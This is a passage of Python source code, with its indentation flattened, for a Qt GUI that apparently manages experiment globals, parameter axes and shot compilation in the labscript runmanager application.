self.ui.treeView_globals.resizeColumnToContents(self.GLOBALS_COL_DELETE)
def connect_signals(self):
self.ui.treeView_globals.leftClicked.connect(self.on_treeView_globals_leftClicked)
self.ui.treeView_globals.customContextMenuRequested.connect(self.on_treeView_globals_context_menu_requested)
self.action_globals_set_selected_true.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('True'))
self.action_globals_set_selected_false.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('False'))
self.action_globals_delete_selected.triggered.connect(self.on_globals_delete_selected_triggered)
self.globals_model.itemChanged.connect(self.on_globals_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.globals_model_item_changed_disconnected = DisconnectContextManager(
self.globals_model.itemChanged, self.on_globals_model_item_changed)
def set_file_and_group_name(self, globals_file, group_name):
"""Provided as a separate method so the main app can call it if the
group gets renamed"""
self.globals_file = globals_file
self.group_name = group_name
self.ui.label_globals_file.setText(globals_file)
self.ui.label_group_name.setText(group_name)
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.setTabText(index, group_name)
self.tabWidget.setTabToolTip(index, '%s\n(%s)' % (group_name, globals_file))
def set_tab_icon(self, icon_string):
index = self.tabWidget.indexOf(self.ui)
if icon_string is not None:
icon = QtGui.QIcon(icon_string)
else:
icon = QtGui.QIcon()
if self.tabWidget.tabIcon(index).cacheKey() != icon.cacheKey():
logger.info('setting tab icon')
self.tabWidget.setTabIcon(index, icon)
def populate_model(self):
globals = runmanager.get_globals({self.group_name: self.globals_file})[self.group_name]
for name, (value, units, expansion) in globals.items():
row = self.make_global_row(name, value, units, expansion)
self.globals_model.appendRow(row)
value_item = row[self.GLOBALS_COL_VALUE]
self.check_for_boolean_values(value_item)
expansion_item = row[self.GLOBALS_COL_EXPANSION]
self.on_globals_model_expansion_changed(expansion_item)
# Add the dummy item at the end:
dummy_delete_item = QtGui.QStandardItem()
# This lets later code know that this row does not correspond to an
# actual global:
dummy_delete_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item.setToolTip('Click to add global')
dummy_name_item = QtGui.QStandardItem(self.GLOBALS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add global')
dummy_name_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GLOBALS_DUMMY_ROW_TEXT, self.GLOBALS_ROLE_PREVIOUS_TEXT)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_name_item.setBackground(QtGui.QColor(self.COLOR_NAME))
dummy_value_item = QtGui.QStandardItem()
dummy_value_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_value_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_value_item.setToolTip('Click to add global')
dummy_units_item = QtGui.QStandardItem()
dummy_units_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_units_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_units_item.setToolTip('Click to add global')
dummy_expansion_item = QtGui.QStandardItem()
dummy_expansion_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_expansion_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_expansion_item.setToolTip('Click to add global')
self.globals_model.appendRow(
[dummy_delete_item, dummy_name_item, dummy_value_item, dummy_units_item, dummy_expansion_item])
# Sort by name:
self.ui.treeView_globals.sortByColumn(self.GLOBALS_COL_NAME, QtCore.Qt.AscendingOrder)
def make_global_row(self, name, value='', units='', expansion=''):
logger.debug('%s:%s - make global row: %s ' % (self.globals_file, self.group_name, name))
# We just set some data here, other stuff is set in
# self.update_parse_indication after runmanager has a chance to parse
# everything and get back to us about what that data should be.
delete_item = QtGui.QStandardItem()
delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
delete_item.setData(False, self.GLOBALS_ROLE_SORT_DATA)
delete_item.setEditable(False)
delete_item.setToolTip('Delete global from group.')
name_item = QtGui.QStandardItem(name)
name_item.setData(name, self.GLOBALS_ROLE_SORT_DATA)
name_item.setData(name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_item.setToolTip(name)
name_item.setBackground(QtGui.QColor(self.COLOR_NAME))
value_item = QtGui.QStandardItem(value)
value_item.setData(value, self.GLOBALS_ROLE_SORT_DATA)
value_item.setData(str(value), self.GLOBALS_ROLE_PREVIOUS_TEXT)
value_item.setToolTip('Evaluating...')
units_item = QtGui.QStandardItem(units)
units_item.setData(units, self.GLOBALS_ROLE_SORT_DATA)
units_item.setData(units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
# Treeview.moveCursor will see this and not go to the expansion item
# when tab is pressed after editing:
units_item.setData(True, self.GLOBALS_ROLE_IGNORE_TABNEXT)
units_item.setToolTip('')
expansion_item = QtGui.QStandardItem(expansion)
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
expansion_item.setToolTip('')
row = [delete_item, name_item, value_item, units_item, expansion_item]
return row
def on_treeView_globals_leftClicked(self, index):
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.globals_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new global' row. Enter editing mode on
# the name item so they can enter a name for the new global:
self.ui.treeView_globals.setCurrentIndex(name_index)
self.ui.treeView_globals.edit(name_index)
elif item.data(self.GLOBALS_ROLE_IS_BOOL):
# It's a bool indicator. Toggle it
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
value_item.setText('False')
elif value_item.text() == 'False':
value_item.setText('True')
else:
raise AssertionError('expected boolean value')
elif item.column() == self.GLOBALS_COL_DELETE:
# They clicked a delete button.
self.delete_global(global_name)
elif not item.data(self.GLOBALS_ROLE_IS_BOOL):
# Edit whatever it is:
if (self.ui.treeView_globals.currentIndex() != index
or self.ui.treeView_globals.state() != QtWidgets.QTreeView.EditingState):
self.ui.treeView_globals.setCurrentIndex(index)
self.ui.treeView_globals.edit(index)
def on_globals_model_item_changed(self, item):
if item.column() == self.GLOBALS_COL_NAME:
self.on_globals_model_name_changed(item)
elif item.column() == self.GLOBALS_COL_VALUE:
self.on_globals_model_value_changed(item)
elif item.column() == self.GLOBALS_COL_UNITS:
self.on_globals_model_units_changed(item)
elif item.column() == self.GLOBALS_COL_EXPANSION:
self.on_globals_model_expansion_changed(item)
def on_globals_model_name_changed(self, item):
"""Handles global renaming and creation of new globals due to the user
editing the <click to add global> item"""
item_text = item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
if item_text != self.GLOBALS_DUMMY_ROW_TEXT:
# The user has made a new global by editing the <click to add
# global> item
global_name = item_text
self.new_global(global_name)
else:
# User has renamed a global.
new_global_name = item_text
previous_global_name = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
# Ensure the name actually changed, rather than something else
# about the item:
if new_global_name != previous_global_name:
self.rename_global(previous_global_name, new_global_name)
def on_globals_model_value_changed(self, item):
index = item.index()
new_value = item.text()
previous_value = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Ensure the value actually changed, rather than something else about
# the item:
if new_value != previous_value:
self.change_global_value(global_name, previous_value, new_value)
def on_globals_model_units_changed(self, item):
index = item.index()
new_units = item.text()
previous_units = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# If it's a boolean value, ensure the check state matches the bool state:
if item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
item.setCheckState(QtCore.Qt.Checked)
elif value_item.text() == 'False':
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('expected boolean value')
# Ensure the value actually changed, rather than something else about
# the item:
if new_units != previous_units:
self.change_global_units(global_name, previous_units, new_units)
def on_globals_model_expansion_changed(self, item):
index = item.index()
new_expansion = item.text()
previous_expansion = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Don't want icon changing to recurse - which happens even if it is
# the same icon. So disconnect the signal temporarily:
with self.globals_model_item_changed_disconnected:
if new_expansion == 'outer':
item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be outer producted with other lists to form a larger parameter space.')
elif new_expansion:
item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be iterated over in lock-step with other globals in the ' +
'\'%s\' zip group.' % new_expansion)
else:
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('This global will be interpreted as a single value and passed to compilation as-is.')
# Ensure the value actually changed, rather than something else about
# the item:
if new_expansion != previous_expansion:
self.change_global_expansion(global_name, previous_expansion, new_expansion)
def on_treeView_globals_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_globals_set_selected_true)
menu.addAction(self.action_globals_set_selected_false)
menu.addAction(self.action_globals_delete_selected)
menu.exec_(QtGui.QCursor.pos())
def on_globals_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_globals.selectedIndexes()
selected_items = (self.globals_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_NAME]
# If multiple selected, show 'delete n globals?' message. Otherwise,
# pass confirm=True to self.delete_global so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d globals?" % len(name_items)):
return
for item in name_items:
global_name = item.text()
self.delete_global(global_name, confirm=not confirm_multiple)
def on_globals_set_selected_bools_triggered(self, state):
selected_indexes = self.ui.treeView_globals.selectedIndexes()
selected_items = [self.globals_model.itemFromIndex(index) for index in selected_indexes]
value_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_VALUE]
units_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_UNITS]
for value_item, units_item in zip(value_items, units_items):
if units_item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item.setText(state)
def close(self):
# It is up to the main runmanager class to drop references to this
# instance before or after calling this method, so that after the
# tabWidget no longer owns our widgets, both the widgets and the
# instance will be garbage collected.
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.removeTab(index)
def get_global_item_by_name(self, global_name, column, previous_name=None):
"""Returns an item from the row representing a global in the globals model.
Which item is returned is set by the column argument."""
possible_name_items = self.globals_model.findItems(global_name, column=self.GLOBALS_COL_NAME)
if previous_name is not None:
# Filter by previous name, useful for telling rows apart when a
# rename is in progress and two rows may temporarily contain the
same name (though the rename code will throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) == previous_name]
elif global_name != self.GLOBALS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new global is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.globals_model.itemFromIndex(item_index)
return item
def do_model_sort(self):
header = self.ui.treeView_globals.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_globals.sortByColumn(sort_column, sort_order)
def new_global(self, global_name):
logger.info('%s:%s - new global: %s', self.globals_file, self.group_name, global_name)
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME,
previous_name=self.GLOBALS_DUMMY_ROW_TEXT)
try:
runmanager.new_global(self.globals_file, self.group_name, global_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created global into the model:
global_row = self.make_global_row(global_name)
last_index = self.globals_model.rowCount()
# Insert it as the row before the last (dummy) row:
self.globals_model.insertRow(last_index - 1, global_row)
self.do_model_sort()
# Go into edit mode on the 'value' item:
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE,
previous_name=global_name)
value_item_index = value_item.index()
self.ui.treeView_globals.setCurrentIndex(value_item_index)
self.ui.treeView_globals.edit(value_item_index)
self.globals_changed()
finally:
# Set the dummy row's text back, ready for another global to be created:
item.setText(self.GLOBALS_DUMMY_ROW_TEXT)
def rename_global(self, previous_global_name, new_global_name):
logger.info('%s:%s - rename global: %s -> %s',
self.globals_file, self.group_name, previous_global_name, new_global_name)
item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_NAME,
previous_name=previous_global_name)
try:
runmanager.rename_global(self.globals_file, self.group_name, previous_global_name, new_global_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_global_name)
else:
item.setData(new_global_name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_global_name, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
item.setToolTip(new_global_name)
self.globals_changed()
value_item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_VALUE)
value = value_item.text()
if not value:
# Go into editing the value item automatically:
value_item_index = value_item.index()
self.ui.treeView_globals.setCurrentIndex(value_item_index)
self.ui.treeView_globals.edit(value_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_value(self, global_name, previous_value, new_value):
logger.info('%s:%s - change global value: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_value, new_value))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
previous_background = item.background()
previous_icon = item.icon()
item.setData(new_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(None, QtCore.Qt.BackgroundRole)
item.setIcon(QtGui.QIcon(':qtutils/fugue/hourglass'))
args = global_name, previous_value, new_value, item, previous_background, previous_icon
QtCore.QTimer.singleShot(1, lambda: self.complete_change_global_value(*args))
def complete_change_global_value(self, global_name, previous_value, new_value, item, previous_background, previous_icon):
try:
runmanager.set_value(self.globals_file, self.group_name, global_name, new_value)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old value, since the change failed:
with self.globals_model_item_changed_disconnected:
item.setText(previous_value)
item.setData(previous_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(previous_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(previous_background, QtCore.Qt.BackgroundRole)
item.setIcon(previous_icon)
else:
self.check_for_boolean_values(item)
self.do_model_sort()
item.setToolTip('Evaluating...')
self.globals_changed()
units_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
units = units_item.text()
if not units:
# Go into editing the units item automatically:
units_item_index = units_item.index()
self.ui.treeView_globals.setCurrentIndex(units_item_index)
self.ui.treeView_globals.edit(units_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_units(self, global_name, previous_units, new_units):
logger.info('%s:%s - change units: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_units, new_units))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
try:
runmanager.set_units(self.globals_file, self.group_name, global_name, new_units)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_units)
else:
item.setData(new_units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_units, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_expansion(self, global_name, previous_expansion, new_expansion):
logger.info('%s:%s - change expansion: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_expansion, new_expansion))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
try:
runmanager.set_expansion(self.globals_file, self.group_name, global_name, new_expansion)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old expansion, since the change failed:
item.setText(previous_expansion)
else:
item.setData(new_expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_expansion, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
self.globals_changed()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def check_for_boolean_values(self, item):
"""Checks if the value is 'True' or 'False'. If either, makes the
units cell checkable, uneditable, and coloured to indicate the state.
The units cell can then be clicked to toggle the value."""
index = item.index()
value = item.text()
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
units_index = index.sibling(index.row(), self.GLOBALS_COL_UNITS)
name_item = self.globals_model.itemFromIndex(name_index)
units_item = self.globals_model.itemFromIndex(units_index)
global_name = name_item.text()
logger.debug('%s:%s - check for boolean values: %s' %
(self.globals_file, self.group_name, global_name))
if value == 'True':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!1', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Checked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_ON)))
elif value == 'False':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!0', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Unchecked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_OFF)))
else:
was_bool = units_item.data(self.GLOBALS_ROLE_IS_BOOL)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setEditable(True)
# Checkbox still visible unless we do the following:
units_item.setData(None, QtCore.Qt.CheckStateRole)
units_item.setData(None, QtCore.Qt.BackgroundRole)
if was_bool:
# If the item was a bool and now isn't, clear the
# units and go into editing so the user can enter a
# new units string:
units_item.setText('')
self.ui.treeView_globals.setCurrentIndex(units_item.index())
self.ui.treeView_globals.edit(units_item.index())
def globals_changed(self):
"""Called whenever something about a global has changed. call
app.globals_changed to inform the main application that it needs to
parse globals again. self.update_parse_indication will be called by
the main app when parsing is done, and will set the colours and
tooltips appropriately"""
# Tell the main app about it:
app.globals_changed()
def delete_global(self, global_name, confirm=True):
logger.info('%s:%s - delete global: %s' %
(self.globals_file, self.group_name, global_name))
if confirm:
if not question_dialog("Delete the global '%s'?" % global_name):
return
runmanager.delete_global(self.globals_file, self.group_name, global_name)
# Find the entry for this global in self.globals_model and remove it:
name_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME)
self.globals_model.removeRow(name_item.row())
self.globals_changed()
def update_parse_indication(self, active_groups, sequence_globals, evaled_globals):
# Check that we are an active group:
if self.group_name in active_groups and active_groups[self.group_name] == self.globals_file:
tab_contains_errors = False
# for global_name, value in evaled_globals[self.group_name].items():
for i in range(self.globals_model.rowCount()):
name_item = self.globals_model.item(i, self.GLOBALS_COL_NAME)
if name_item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
value_item = self.globals_model.item(i, self.GLOBALS_COL_VALUE)
expansion_item = self.globals_model.item(i, self.GLOBALS_COL_EXPANSION)
# value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
# expansion_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
global_name = name_item.text()
value = evaled_globals[self.group_name][global_name]
ignore, ignore, expansion = sequence_globals[self.group_name][global_name]
# Temporarily disconnect the item_changed signal on the model
# so that we can set the expansion type without triggering
# another preparse - the parsing has already been done with
# the new expansion type.
with self.globals_model_item_changed_disconnected:
if expansion_item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) != expansion:
# logger.info('expansion previous text set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
if expansion_item.data(self.GLOBALS_ROLE_SORT_DATA) != expansion:
# logger.info('sort data role set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
# The next line will now trigger item_changed, but it will not
# be detected as an actual change to the expansion type,
# because previous_text will match text. So it will not look
# like a change and will not trigger preparsing. However, it is
# still important that other triggers be processed, such as
# setting the icon in the expansion item, so that will still
# occur in the callback.
expansion_item.setText(expansion)
if isinstance(value, Exception):
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_ERROR)))
value_item.setIcon(QtGui.QIcon(':qtutils/fugue/exclamation'))
tooltip = '%s: %s' % (value.__class__.__name__, value.message)
tab_contains_errors = True
else:
if value_item.background().color().name().lower() != self.COLOR_OK.lower():
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_OK)))
if not value_item.icon().isNull():
# logger.info('clearing icon')
value_item.setData(None, QtCore.Qt.DecorationRole)
tooltip = repr(value)
if value_item.toolTip() != tooltip:
# logger.info('tooltip_changed')
value_item.setToolTip(tooltip)
if tab_contains_errors:
self.set_tab_icon(':qtutils/fugue/exclamation')
else:
self.set_tab_icon(None)
else:
# Clear everything:
self.set_tab_icon(None)
for row in range(self.globals_model.rowCount()):
item = self.globals_model.item(row, self.GLOBALS_COL_VALUE)
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('Group inactive')
item.setData(None, QtCore.Qt.BackgroundRole)
class RunmanagerMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
def closeEvent(self, event):
if app.on_close_event():
return QtWidgets.QMainWindow.closeEvent(self, event)
else:
event.ignore()
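# Qt can recreate the native window (and hence its window ID) behind our
# backs; re-emit the new ID so that per-window setup such as
# set_win_appusermodel can be re-applied (see RunManager.connect_signals below).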
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class PoppedOutOutputBoxWindow(QtWidgets.QDialog):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
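# Closing the popped-out window is treated as clicking the pop-out button
# again: the output box is docked back into its tab rather than destroyed.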
def closeEvent(self, event):
app.on_output_popout_button_clicked()
def event(self, event):
result = QtWidgets.QDialog.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunManager(object):
# Constants for the model in the axes tab:
AXES_COL_NAME = 0
AXES_COL_LENGTH = 1
AXES_COL_SHUFFLE = 2
AXES_ROLE_NAME = QtCore.Qt.UserRole + 1
# Constants for the model in the groups tab:
GROUPS_COL_NAME = 0
GROUPS_COL_ACTIVE = 1
GROUPS_COL_DELETE = 2
GROUPS_COL_OPENCLOSE = 3
GROUPS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GROUPS_ROLE_PREVIOUS_NAME = QtCore.Qt.UserRole + 2
GROUPS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 3
GROUPS_ROLE_GROUP_IS_OPEN = QtCore.Qt.UserRole + 4
GROUPS_DUMMY_ROW_TEXT = '<Click to add group>'
def __init__(self):
loader = UiLoader()
loader.registerCustomWidget(FingerTabWidget)
loader.registerCustomWidget(TreeView)
self.ui = loader.load('main.ui', RunmanagerMainWindow())
self.output_box = OutputBox(self.ui.verticalLayout_output_tab)
# Add a 'pop-out' button to the output tab:
output_tab_index = self.ui.tabWidget.indexOf(self.ui.tab_output)
self.output_popout_button = TabToolButton(self.ui.tabWidget.parent())
self.output_popout_button.setIcon(QtGui.QIcon(':/qtutils/fugue/arrow-out'))
self.output_popout_button.setToolTip('Toggle whether the output box is in a separate window')
self.ui.tabWidget.tabBar().setTabButton(output_tab_index, QtWidgets.QTabBar.RightSide, self.output_popout_button)
# Fix the first three tabs in place:
for index in range(3):
self.ui.tabWidget.tabBar().setMovable(False, index=index)
# Whether or not the output box is currently popped out:
self.output_box_is_popped_out = False
# The window it will be moved to when popped out:
self.output_box_window = PoppedOutOutputBoxWindow(self.ui, QtCore.Qt.WindowSystemMenuHint)
self.output_box_window_verticalLayout = QtWidgets.QVBoxLayout(self.output_box_window)
self.output_box_window_verticalLayout.setContentsMargins(0, 0, 0, 0)
self.output_box_window.setWindowTitle('runmanager output')
self.output_box_window.resize(800, 1000)
self.setup_config()
self.setup_axes_tab()
self.setup_groups_tab()
self.connect_signals()
# The last location from which a labscript file was selected, defaults
# to labscriptlib:
self.last_opened_labscript_folder = self.exp_config.get('paths', 'labscriptlib')
# The last location from which a globals file was selected, defaults
# to experiment_shot_storage:
self.last_opened_globals_folder = self.exp_config.get('paths', 'experiment_shot_storage')
# The last file to which the user saved or loaded a configuration:
self.last_save_config_file = None
# The last manually selected shot output folder, defaults to
# experiment_shot_storage:
self.last_selected_shot_output_folder = self.exp_config.get('paths', 'experiment_shot_storage')
self.shared_drive_prefix = self.exp_config.get('paths', 'shared_drive')
self.experiment_shot_storage = self.exp_config.get('paths', 'experiment_shot_storage')
# What the automatically created output folders should be, as an
# argument to time.strftime():
try:
self.output_folder_format = self.exp_config.get('runmanager', 'output_folder_format')
# It must not start with a path separator (otherwise os.path.join would
# treat it as an absolute path); trailing separators are harmless:
self.output_folder_format = self.output_folder_format.strip(os.path.sep)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_folder_format = os.path.join('%Y', '%m', '%d')
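# e.g. with the default format, a shot output folder ends up looking like
# (illustrative experiment name and date only):
#   <experiment_shot_storage>/my_experiment/2015/06/23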
# Store the currently open groups as {(globals_filename, group_name): GroupTab}
self.currently_open_groups = {}
# A thread that will evaluate globals when they change, allowing us to
# show their values and any errors in the tabs they came from.
self.preparse_globals_thread = threading.Thread(target=self.preparse_globals_loop)
self.preparse_globals_thread.daemon = True
# A threading.Event to inform the preparser thread when globals have
# changed, and thus need parsing again:
self.preparse_globals_required = threading.Event()
self.preparse_globals_thread.start()
# A flag telling the compilation thread to abort:
self.compilation_aborted = threading.Event()
# A few attributes for self.guess_expansion_modes() to keep track of
# its state, and thus detect changes:
self.previous_evaled_globals = {}
self.previous_global_hierarchy = {}
self.previous_expansion_types = {}
self.previous_expansions = {}
# Start the loop that allows compilations to be queued up:
self.compile_queue = Queue.Queue()
self.compile_queue_thread = threading.Thread(target=self.compile_loop)
self.compile_queue_thread.daemon = True
self.compile_queue_thread.start()
# Start the compiler subprocess:
self.to_child, self.from_child, self.child = zprocess.subprocess_with_queues(
'batch_compiler.py', self.output_box.port)
# Start a thread to monitor the time of day and create new shot output
# folders for each day:
self.output_folder_update_required = threading.Event()
inthread(self.rollover_shot_output_folder)
# The data from the last time we saved the configuration, so we can
# know if something's changed:
self.last_save_data = None
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('runmanager', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Defer this until 50ms after the window has shown,
# so that the GUI pops up faster in the meantime
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
],
"ports": ['BLACS', 'runviewer'],
"paths": ["shared_drive",
"experiment_shot_storage",
"labscriptlib",
],
}
self.exp_config = LabConfig(required_params = required_config_params)
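# For reference, a minimal labconfig satisfying required_config_params
# might contain entries like the following (illustrative values only):
#   [DEFAULT]
#   experiment_name = my_experiment
#   [programs]
#   text_editor = gedit
#   text_editor_arguments = {file}
#   [ports]
#   BLACS = 42517
#   runviewer = 42519
#   [paths]
#   shared_drive = /shared
#   experiment_shot_storage = /shared/Experiments
#   labscriptlib = /shared/labscriptlib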
def setup_axes_tab(self):
self.axes_model = QtGui.QStandardItemModel()
# Setup the model columns and link to the treeview
name_header_item = QtGui.QStandardItem('Name')
name_header_item.setToolTip('The name of the global or zip group being iterated over')
self.axes_model.setHorizontalHeaderItem(self.AXES_COL_NAME, name_header_item)
length_header_item = QtGui.QStandardItem('Length')
length_header_item.setToolTip('The number of elements in the axis of the parameter space')
